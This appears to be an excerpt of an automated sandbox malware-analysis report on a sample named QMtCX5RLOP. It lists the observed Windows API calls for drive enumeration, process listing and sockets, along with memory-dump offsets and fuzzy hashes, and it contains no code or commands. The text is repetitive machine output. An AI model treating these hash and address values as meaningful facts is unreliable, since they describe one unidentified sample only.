                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km$]jl
                                                            • API String ID: 2623510744-3120149324
                                                            • Opcode ID: 8944898171967d7035dcdd834e5db4a8d8077eed7f4736fa293f7164c6bc72a6
                                                            • Instruction ID: 910cef62b8b628c58874a14c7cb650eff28367946f93dff3c13e347014b7b00c
                                                            • Opcode Fuzzy Hash: 8944898171967d7035dcdd834e5db4a8d8077eed7f4736fa293f7164c6bc72a6
                                                            • Instruction Fuzzy Hash: AA81F7E714C321BDBBC284456B54AFB276EEFD7730370942EF807C6A42E3940A4A51B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 349b78c2d4f6b02f4365c33ebb2b0ca99ea1ed969f8fd3a4c48d3d5b3fcb968d
                                                            • Instruction ID: efe68a25b284e2eb021faa73b680fbbd5a8255d9b77e426ee0daa9d99c2bbed4
                                                            • Opcode Fuzzy Hash: 349b78c2d4f6b02f4365c33ebb2b0ca99ea1ed969f8fd3a4c48d3d5b3fcb968d
                                                            • Instruction Fuzzy Hash: 7C713BEB24C221BD7392C5822F64EFB576DE5D67303329427FC07D6506E2984E8E51B2
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 09bf20d3590e512cf3a21a3b8257f8d558404497c0462dc32109ccea30a27839
                                                            • Instruction ID: d31d9e0c4c949f4c072a3cd7b855120af3c0b91d39fedcc226b3170d71c9f611
                                                            • Opcode Fuzzy Hash: 09bf20d3590e512cf3a21a3b8257f8d558404497c0462dc32109ccea30a27839
                                                            • Instruction Fuzzy Hash: 3C612AEB24C221BD729285822F24EFB576DE5D6730332E427FC07D6506E2994E8E51B2
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 483cfad8b1d9afe8208508b3741d01516a7963d3b17317d4298542949af4dd14
                                                            • Instruction ID: 8da13f5e819bd844e54f20f3f8b902b6c9eb2adcc7b61034514bee9a58a9c087
                                                            • Opcode Fuzzy Hash: 483cfad8b1d9afe8208508b3741d01516a7963d3b17317d4298542949af4dd14
                                                            • Instruction Fuzzy Hash: E2612BEB14C221BD729285822F24EFB576DE5D6730332E427FC07D6906E2984E8E51B2
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 0ae12f5189e6c0f5c48bbc54b087742c9b87a953dd6e84d9d906ba9769ec6827
                                                            • Instruction ID: d335b5ba83c8b8441561d979434c7e82de9ef0008750d36fd8ac9910988689ee
                                                            • Opcode Fuzzy Hash: 0ae12f5189e6c0f5c48bbc54b087742c9b87a953dd6e84d9d906ba9769ec6827
                                                            • Instruction Fuzzy Hash: 99613AEB14C221BD738285822B24EFB576DE5D6730332E427FC07D6506E2984E8E51B2
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00D7A1C7
                                                            Strings
                                                            • getsockname() failed with errno %d: %s, xrefs: 00D7A1F0
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00D7A23B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00D5D65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E0AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E0ABE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km
                                                            • API String ID: 2623510744-3170351591
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km
                                                            • API String ID: 2623510744-3170351591
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: ace584b18a331ab3483de85a80912c4c40936f9420069cc98a8997ca9d80c1f5
                                                            • Instruction ID: 82807a8ed670440da305b00bb3b490b9dc056f0e467282a21ebc02f0b60b6c17
                                                            • Opcode Fuzzy Hash: ace584b18a331ab3483de85a80912c4c40936f9420069cc98a8997ca9d80c1f5
                                                            • Instruction Fuzzy Hash: A05119EB64D221BE728281522F24EFB576DD5D6730332D82BFC07D2506E2894E8E61B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 36b3b9663356b2469d1f9475392e1e9628a93a3c60a015cf6972c742068f2716
                                                            • Instruction ID: 74b8ad4606971766b6974c3681695f18bb14eeea0e05bbf4ae78ee34d639fb89
                                                            • Opcode Fuzzy Hash: 36b3b9663356b2469d1f9475392e1e9628a93a3c60a015cf6972c742068f2716
                                                            • Instruction Fuzzy Hash: 1F516EEB10C3217EB38285512B68AFA576DE5D6730332D867FC03C5546E2894E8E51B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: e1712e0e661852909d6e9290a76a5f79055e6beefd51754e6ebc6a4dcb843e3d
                                                            • Instruction ID: fa44908265e19360452841a26ffe1d1c1c2f3572548daebc912a9973bf8b84cf
                                                            • Opcode Fuzzy Hash: e1712e0e661852909d6e9290a76a5f79055e6beefd51754e6ebc6a4dcb843e3d
                                                            • Instruction Fuzzy Hash: D3511BEB60C221BD7282C5422F64EFB576DE5D6730332D86BFC07D2506E2894E8E61B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 96a62a4d36d5614443ea99be5347e49d4941024628a1f826aca410d8ae6b6c6c
                                                            • Instruction ID: 0c157b972c5a00d8d1657afccdeba1e67e5da9b813a098e50f186921b4c37904
                                                            • Opcode Fuzzy Hash: 96a62a4d36d5614443ea99be5347e49d4941024628a1f826aca410d8ae6b6c6c
                                                            • Instruction Fuzzy Hash: 02413CEB60C321BE738285522B24AFB576DE5D6730332E877FC07D1506E2894E8E51B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 1656ae96066ede3efb5f8cd938d414f1809374e16da22cb1cffdb1ea2beec866
                                                            • Instruction ID: 0eca08e54a68b50ff14a3a83af6eba662b8069cbe1445b13238154c27837f99a
                                                            • Opcode Fuzzy Hash: 1656ae96066ede3efb5f8cd938d414f1809374e16da22cb1cffdb1ea2beec866
                                                            • Instruction Fuzzy Hash: 92314DEB60C321BE738285422B64AFA576DE5E6730332A477FC07D5505E2894E8E51B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 6d72d26e269cda7b6b5bc0f5a0993ad22cfff1b0c713dff8aa3a11e412305fee
                                                            • Instruction ID: 2c6d172625a906a839751efd736ee3d3b62a5468b96bd8d607d838fd27fb72e2
                                                            • Opcode Fuzzy Hash: 6d72d26e269cda7b6b5bc0f5a0993ad22cfff1b0c713dff8aa3a11e412305fee
                                                            • Instruction Fuzzy Hash: F0315CEB60D321BE738285522B24EFA576DE5D6730332E87BFC07D5505E2884E8A51B1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseEvent
                                                            • String ID: multi.c
                                                            • API String ID: 2624557715-214371023
                                                            • Opcode ID: 096bceecf463405478f2b5ac41199a538efc2998c69f10789364b1f9fa803add
                                                            • Instruction ID: ad3e760a5fb116dd31600c9b29312dfd2635810c807dbe58228ca5e18563038c
                                                            • Opcode Fuzzy Hash: 096bceecf463405478f2b5ac41199a538efc2998c69f10789364b1f9fa803add
                                                            • Instruction Fuzzy Hash: 1C51B8B5D043019BEB11AB30AC42B5736A4EF55358F0C4938F9899A263FB75E50987B3
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: a4ee00a01ef5cf25003772383084d4306846b02e2ed8b01d195a0bb2310fc05a
                                                            • Instruction ID: e57b7ab58c0425fb027388952b14f945b5e4a911e9495a006e9a113ebca9faa9
                                                            • Opcode Fuzzy Hash: a4ee00a01ef5cf25003772383084d4306846b02e2ed8b01d195a0bb2310fc05a
                                                            • Instruction Fuzzy Hash: ABD05E32A0A2213B86206999AC88C9B6BA8DEC6F60B0A0D58F98077204D2219D0183F3
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00E0B29E,?,00000000,?,?), ref: 00E0B0BA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00DF3C41,00000000), ref: 00E0B0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            • Opcode ID: 748dddc3a95af2eb701a877b4af307a148a94c3e75589667a836c7170dd25654
                                                            • Instruction ID: c49b90f1313231af5da550bf970abbca8da7860d17b0402ca34a91a60f3106f1
                                                            • Opcode Fuzzy Hash: 748dddc3a95af2eb701a877b4af307a148a94c3e75589667a836c7170dd25654
                                                            • Instruction Fuzzy Hash: 5701D836304201DBDA205A688C44FABB399FF89368F140754F978B31D1D726ED908752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1371a5a41cb1b12fdde463a1e148abc676c10f1233ae10a96c325e8c2e6155fd
                                                            • Instruction ID: 4956babbca9ec7855a447c478cd9dcb722382a6282eef6ab3cffe7040b5e2405
                                                            • Opcode Fuzzy Hash: 1371a5a41cb1b12fdde463a1e148abc676c10f1233ae10a96c325e8c2e6155fd
                                                            • Instruction Fuzzy Hash: DA71E8E714C311BDBBD2C4456B54AFB276EEFD67303B0A52EF807C6542E3940A4A51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ade0712181744f4cdf8f77af1b239a25868f1ead8f6b536445880ddd43a19a64
                                                            • Instruction ID: 71f205d2cadc3c1f9a3baec76699ce4efd56f2c16c7ce5bbc83ac1acc7e67535
                                                            • Opcode Fuzzy Hash: ade0712181744f4cdf8f77af1b239a25868f1ead8f6b536445880ddd43a19a64
                                                            • Instruction Fuzzy Hash: 2371D5E714C321BDBBC2C1456B54AFA676EEFD6730770942FF807C6A42E3940A4A51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: d31add5e93c236f320cf1159b9520ea13b29d85757b696d43451952ad424f337
                                                            • Instruction ID: 3a88602e922e12a82af8c6a0c43346e0abf1ffd1a526c151a34d58a9f6d39706
                                                            • Opcode Fuzzy Hash: d31add5e93c236f320cf1159b9520ea13b29d85757b696d43451952ad424f337
                                                            • Instruction Fuzzy Hash: D871E6E714C321BDBBC280456B54AFA676EEFD6730370942FF807C6A42E3940A4A50B1
                                                            Memory Dump Source
